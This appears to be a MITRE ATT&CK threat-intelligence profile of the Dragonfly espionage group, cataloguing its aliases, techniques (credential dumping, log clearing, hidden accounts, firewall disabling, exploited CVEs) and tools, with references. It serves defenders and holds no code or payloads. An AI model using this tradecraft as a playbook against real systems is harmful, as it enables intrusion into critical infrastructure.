Skip to content

G0035 Dragonfly

Dragonfly is a cyber espionage group that has been attributed to Russia’s Federal Security Service (FSB) Center 16.213 Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.1171049112

Item Value
ID G0035
Associated Names TEMP.Isotope, DYMALLOY, Berserk Bear, TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear
Version 3.1
Created 31 May 2017
Last Modified 08 March 2023
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
TEMP.Isotope 59
DYMALLOY 313
Berserk Bear 9213
TG-4192 713
Crouching Yeti 79213
IRON LIBERTY 76813
Energetic Bear 117689213

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.002 Domain Account Dragonfly has used batch scripts to enumerate users on a victim domain controller.14
enterprise T1098 Account Manipulation Dragonfly has added newly created accounts to the administrators group to maintain elevated access.14
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains Dragonfly has registered domains for targeting intended victims.1
enterprise T1583.003 Virtual Private Server Dragonfly has acquired VPS infrastructure for use in malicious campaigns.9
enterprise T1595 Active Scanning -
enterprise T1595.002 Vulnerability Scanning Dragonfly has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.1
enterprise T1071 Application Layer Protocol Dragonfly has used SMB for C2.14
enterprise T1560 Archive Collected Data Dragonfly has compressed data into .zip files prior to exfiltration.14
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.14
enterprise T1110 Brute Force Dragonfly has attempted to brute force credentials to gain access.1
enterprise T1110.002 Password Cracking Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.1416
enterprise T1059 Command and Scripting Interpreter Dragonfly has used the command line for execution.14
enterprise T1059.001 PowerShell Dragonfly has used PowerShell scripts for execution.1410
enterprise T1059.003 Windows Command Shell Dragonfly has used various types of scripting to perform operations, including batch scripts.14
enterprise T1059.006 Python Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.14
enterprise T1584 Compromise Infrastructure -
enterprise T1584.004 Server Dragonfly has compromised legitimate websites to host C2 and malware modules.9
enterprise T1136 Create Account -
enterprise T1136.001 Local Account Dragonfly has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.14
enterprise T1005 Data from Local System Dragonfly has collected data from local victim systems.14
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging Dragonfly has created a directory named “out” in the user’s %AppData% folder and copied files to it.14
enterprise T1189 Drive-by Compromise Dragonfly has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.7149
enterprise T1114 Email Collection -
enterprise T1114.002 Remote Email Collection Dragonfly has accessed email accounts using Outlook Web Access.14
enterprise T1190 Exploit Public-Facing Application Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.1
enterprise T1203 Exploitation for Client Execution Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.9
enterprise T1210 Exploitation of Remote Services Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.1
enterprise T1133 External Remote Services Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.141
enterprise T1083 File and Directory Discovery Dragonfly has used a batch script to gather folder and file names from victim hosts.1491
enterprise T1187 Forced Authentication Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.149
enterprise T1591 Gather Victim Org Information -
enterprise T1591.002 Business Relationships Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.9
enterprise T1564 Hide Artifacts -
enterprise T1564.002 Hidden Users Dragonfly has modified the Registry to hide created user accounts.14
enterprise T1562 Impair Defenses -
enterprise T1562.004 Disable or Modify System Firewall Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.14
enterprise T1070 Indicator Removal -
enterprise T1070.001 Clear Windows Event Logs Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.14
enterprise T1070.004 File Deletion Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.14
enterprise T1105 Ingress Tool Transfer Dragonfly has copied and installed tools for operations once in the victim environment.14
enterprise T1036 Masquerading Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account.14
enterprise T1112 Modify Registry Dragonfly has modified the Registry to perform multiple techniques through the use of Reg.14
enterprise T1135 Network Share Discovery Dragonfly has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.14
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec.7
enterprise T1003 OS Credential Dumping -
enterprise T1003.002 Security Account Manager Dragonfly has dropped and executed SecretsDump to dump password hashes.14
enterprise T1003.003 NTDS Dragonfly has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.1415
enterprise T1003.004 LSA Secrets Dragonfly has dropped and executed SecretsDump to dump password hashes.1415
enterprise T1069 Permission Groups Discovery -
enterprise T1069.002 Domain Groups Dragonfly has used batch scripts to enumerate administrators and users in the domain.14
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment Dragonfly has sent emails with malicious attachments to gain initial access.9
enterprise T1598 Phishing for Information -
enterprise T1598.002 Spearphishing Attachment Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.14
enterprise T1598.003 Spearphishing Link Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.14
enterprise T1012 Query Registry Dragonfly has queried the Registry to identify victim information.14
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol Dragonfly has moved laterally via RDP.14
enterprise T1018 Remote System Discovery Dragonfly has likely obtained a list of hosts in the victim environment.14
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.14
enterprise T1113 Screen Capture Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).14109
enterprise T1505 Server Software Component -
enterprise T1505.003 Web Shell Dragonfly has commonly created Web shells on victims’ publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.14
enterprise T1608 Stage Capabilities -
enterprise T1608.004 Drive-by Target Dragonfly has compromised websites to redirect traffic and to host exploit kits.9
enterprise T1195 Supply Chain Compromise -
enterprise T1195.002 Compromise Software Supply Chain Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.79
enterprise T1016 System Network Configuration Discovery Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.14
enterprise T1033 System Owner/User Discovery Dragonfly used the command query user on victim hosts.14
enterprise T1221 Template Injection Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.14
enterprise T1204 User Execution -
enterprise T1204.002 Malicious File Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.9
enterprise T1078 Valid Accounts Dragonfly has compromised user credentials and used valid accounts for operations.1491
ics T0817 Drive-by Compromise Dragonfly utilized watering hole attacks on energy sector websites by injecting a redirect iframe to deliver Backdoor.Oldrea or Trojan.Karagany. 17
ics T0862 Supply Chain Compromise Dragonfly trojanized legitimate ICS equipment providers software packages available for download on their websites.17

Software

ID Name References Techniques
S0093 Backdoor.Oldrea 119 Email Account:Account Discovery Archive Collected Data Automated Collection Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Credentials from Web Browsers:Credentials from Password Stores Standard Encoding:Data Encoding Denial of Service File and Directory Discovery File Deletion:Indicator Removal Ingress Tool Transfer Network Service Discovery Point & Tag Identification Process Discovery Process Injection Remote System Discovery Remote System Discovery Remote System Information Discovery Spearphishing Attachment Supply Chain Compromise Rundll32:System Binary Proxy Execution System Information Discovery System Network Configuration Discovery System Owner/User Discovery User Execution
S0488 CrackMapExec 714 Domain Account:Account Discovery Brute Force Password Guessing:Brute Force Password Spraying:Brute Force PowerShell:Command and Scripting Interpreter File and Directory Discovery Modify Registry Network Share Discovery LSA Secrets:OS Credential Dumping NTDS:OS Credential Dumping Security Account Manager:OS Credential Dumping Password Policy Discovery Domain Groups:Permission Groups Discovery Remote System Discovery At:Scheduled Task/Job System Information Discovery System Network Configuration Discovery System Network Connections Discovery Pass the Hash:Use Alternate Authentication Material Windows Management Instrumentation
S0357 Impacket 1415 LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Network Sniffing NTDS:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping LSASS Memory:OS Credential Dumping Kerberoasting:Steal or Forge Kerberos Tickets Service Execution:System Services Windows Management Instrumentation
S0500 MCMD 6 Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Data from Local System Hidden Window:Hide Artifacts Clear Persistence:Indicator Removal Ingress Tool Transfer Match Legitimate Name or Location:Masquerading Obfuscated Files or Information Scheduled Task:Scheduled Task/Job
S0002 Mimikatz 7 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores LSASS Memory:OS Credential Dumping DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Ticket:Use Alternate Authentication Material Pass the Hash:Use Alternate Authentication Material
S0039 Net 14 Domain Account:Account Discovery Local Account:Account Discovery Local Account:Create Account Domain Account:Create Account Network Share Connection Removal:Indicator Removal Network Share Discovery Password Policy Discovery Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery SMB/Windows Admin Shares:Remote Services Remote System Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services System Time Discovery
S0108 netsh 14 Netsh Helper DLL:Event Triggered Execution Disable or Modify System Firewall:Impair Defenses Proxy Security Software Discovery:Software Discovery
S0029 PsExec 714109 Domain Account:Create Account Windows Service:Create or Modify System Process Lateral Tool Transfer SMB/Windows Admin Shares:Remote Services Service Execution:System Services
S0075 Reg 14 Modify Registry Query Registry Credentials in Registry:Unsecured Credentials
S0094 Trojan.Karagany 1189 Web Protocols:Application Layer Protocol Application Window Discovery Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Credentials from Web Browsers:Credentials from Password Stores Local Data Staging:Data Staged Asymmetric Cryptography:Encrypted Channel File and Directory Discovery File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Software Packing:Obfuscated Files or Information Obfuscated Files or Information OS Credential Dumping Process Discovery Thread Execution Hijacking:Process Injection Screen Capture System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Checks:Virtualization/Sandbox Evasion

References

  1. CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021. 

  2. Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022. 

  3. Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. 

  4. Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. 

  5. Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022. 

  6. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. 

  7. Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020. 

  8. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020. 

  9. Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021. 

  10. Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. 

  11. Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. 

  12. Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022. 

  13. UK Gov. (2022, April 5). Russia’s FSB malign activity: factsheet. Retrieved April 5, 2022. 

  14. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. 

  15. Core Security. (n.d.). Impacket. Retrieved November 2, 2017. 

  16. Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017. 

  17. Symantec Security Response 2014, July 7 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Retrieved. 2016/04/08